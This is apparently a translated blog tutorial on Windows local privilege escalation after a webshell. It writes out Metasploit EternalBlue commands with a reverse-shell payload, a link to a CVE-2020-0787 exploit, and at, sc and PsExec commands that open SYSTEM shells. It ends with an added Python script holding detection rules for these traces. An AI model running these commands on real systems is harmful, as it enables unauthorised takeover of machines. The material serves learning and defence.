Local empowerment learning
2022-07-24 01:41:00 【Goodric】
Learning local privilege escalation
Privilege escalation, as the name suggests, means raising our level of authority. After we get a shell on a website, our privileges are usually very low (often just those of the apache account). At that point, to turn the exploit into a real win, we need privilege escalation: turning a low privilege (allowed only to list directories) into a high privilege (able to modify files), so that we can continue to penetrate.
Classification of privilege escalation:
Local privilege escalation
Database privilege escalation
Third-party software privilege escalation
Windows and Linux both have these three ways of raising privileges; this article uses Windows as the example.
——
——
First, understand the permission levels in Windows.
System privilege: the highest level of authority in a Windows system. Some operations require System privilege to complete, for example modifying core registry keys or forcibly ending malicious application processes.
Administrator privilege: has the highest management and usage rights, can change all settings of the system, can install and remove programs, and can access all files on the computer. Besides that, it also has the right to control other users.
And lower privileges……
——
——
Account types
Typing netplwiz at the Windows command line or in the Win+R dialog shows the user accounts that exist in Windows.
You can see that the user goodric is in the administrators group, i.e. has administrator privileges.

There are many other groups, each representing different permissions, and an account can be granted different permissions.
Several common account permissions:
Administrator: the administrator has full access to the computer and can make any changes needed. Depending on the notification settings, the administrator may be asked to provide a password or confirmation before making changes that affect other users.
User: standard account users can use most software and can change system settings that do not affect other users.
Guest: by default, guests have the same access as members of the Users group, but the Guest account itself is further restricted.
There are also several other types of account permissions:
PowerUser: in addition to certified applications, power users can also run legacy applications.
PrintOperator: the print operator can gain control of printers.
BackupOperator: backup operators can override security restrictions only for the purpose of backing up or restoring files.
Privilege escalation after getting a webshell
After getting a shell, one way to escalate is through a system kernel vulnerability, for example EternalBlue (MS17-010), a vulnerability in the SMB service on port 445.
To use system kernel vulnerabilities, first use the wesng tool to detect vulnerabilities and defects on the target.
A brief introduction to using wesng: see "Learning and using wesng, a tool for detecting Windows security defects".
After detecting possible vulnerabilities, msf can be used to escalate privileges with the specific vulnerability.
Use the MS17-010 exploit module
use exploit/windows/smb/ms17_010_eternalblue
Set the payload
set payload windows/x64/meterpreter/reverse_tcp
Set the target IP
set rhost 192.168.43.56
Run it
run

It then enters the meterpreter command line, and we have obtained system privileges on the target machine.
——
——
Demonstration of several local privilege escalation methods
1、Privilege escalation via a system kernel vulnerability
Here we use the CVE-2020-0787 vulnerability. Download the exp from GitHub:
https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases
Then drag the exe file into the cmd command line and execute it, i.e. run the path of this file.
After execution, a cmd command line with system privileges pops up.
2、Privilege escalation with the at command
Affected versions: Win2000, Win2003, XP
The idea is to set a scheduled task; when the scheduled time arrives, the task executes cmd.exe.
Schedule cmd.exe to run at 14:46
at 14:46 /interactive cmd.exe
View the currently scheduled tasks
at

When the scheduled time arrives, you can see that a cmd command line with system privileges pops up.
3、Privilege escalation with the sc command
Affected versions: win 7, win8, 2003, 2008
The sc command has one requirement: a space is required between the equals sign and the value.
Create an interactive cmd service called test.
sc create test binPath= "cmd /K start" type= own type= interact
Start the created interactive service
sc start test
After execution, a cmd command line with system privileges pops up.
Here cmd should be run as administrator to execute these commands; otherwise access is denied.
4、Privilege escalation with PsExec
Affected versions: Win2003, Win2008
Download the toolkit:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
Execute the command in the directory containing the downloaded psexec.exe:
psexec.exe -accepteula -s -i -d cmd.exe
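The three methods above (at, sc, PsExec) all leave the same kind of trace: a new service or scheduled task whose program is an interactive shell running as LocalSystem. As an added example that is not part of the original post, the following Python script shows how a defender can pick those traces out of event log data. The event IDs are real (System 7045 "a service was installed", Security 4698 "a scheduled task was created") and PSEXESVC is the service name PsExec installs, but the records below are constructed and simplified: real 4698 events carry the task definition as XML, and the field names here are what a SIEM or a parser of our own would extract.

```python
import re
from typing import Dict, List

# Constructed sample records (not real logs). They mimic the fields extracted from
# Windows events: System 7045 (service installed) and Security 4698 (task created).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # sc create test binPath= "cmd /K start" type= own type= interact
    {"id": "7045", "ServiceName": "test", "ImagePath": "cmd /K start",
     "AccountName": "LocalSystem"},
    # psexec.exe -s cmd.exe installs its helper service on the target
    {"id": "7045", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "AccountName": "LocalSystem"},
    # at 14:46 /interactive cmd.exe creates a task named At1 that runs as SYSTEM
    {"id": "4698", "SubjectUserName": "goodric", "TaskName": "\\At1",
     "Command": "cmd.exe", "RunAs": "S-1-5-18"},
    # benign service install for contrast
    {"id": "7045", "ServiceName": "Spooler",
     "ImagePath": "%SystemRoot%\\System32\\spoolsv.exe", "AccountName": "LocalSystem"},
    # benign built-in task for contrast
    {"id": "4698", "SubjectUserName": "SYSTEM",
     "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "Command": "%windir%\\system32\\defrag.exe", "RunAs": "S-1-5-18"},
]

SYSTEM_SID = "S-1-5-18"  # well-known SID of the LocalSystem account

# Matches a shell interpreter used directly as the service/task program, whether
# written bare ("cmd /K start") or with a full path ("...\System32\cmd.exe").
SHELL_RE = re.compile(r'(?:^|[\\\s"])(?:cmd|powershell|pwsh)(?:\.exe)?\b', re.IGNORECASE)


def classify(event: Dict[str, str]) -> List[str]:
    """Return the detection labels that fire for one event record."""
    hits: List[str] = []
    if event.get("id") == "7045":
        name = event.get("ServiceName", "").upper()
        path = event.get("ImagePath", "")
        # PsExec's -s option runs the child as SYSTEM through this helper service.
        if name == "PSEXESVC" or "PSEXESVC" in path.upper():
            hits.append("psexec_service_installed")
        # A service whose binary is an interactive shell is the sc-based technique.
        if SHELL_RE.search(path):
            hits.append("shell_registered_as_service")
    elif event.get("id") == "4698":
        task = event.get("TaskName", "")
        # The legacy at command names its tasks At1, At2, ...
        if re.fullmatch(r"\\?At\d+", task):
            hits.append("legacy_at_task")
        # A task that launches a shell under the SYSTEM SID is the at-based technique.
        if event.get("RunAs") == SYSTEM_SID and SHELL_RE.search(event.get("Command", "")):
            hits.append("shell_task_runs_as_system")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each suspicious service or task name to the labels that fired for it."""
    report: Dict[str, List[str]] = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            key = ev.get("ServiceName") or ev.get("TaskName") or "<unnamed>"
            report[key] = hits
    return report


if __name__ == "__main__":
    for name, labels in scan(SAMPLE_EVENTS).items():
        print(f"{name}: {', '.join(labels)}")
```

Running it flags test, PSEXESVC and \At1 and stays quiet on Spooler and ScheduledDefrag. In a real deployment the same two rules (shell binary as a service or SYSTEM task, PsExec helper service) would be fed from 7045/4698 events forwarded by the endpoints, which is also the reason those two event sources are worth collecting centrally.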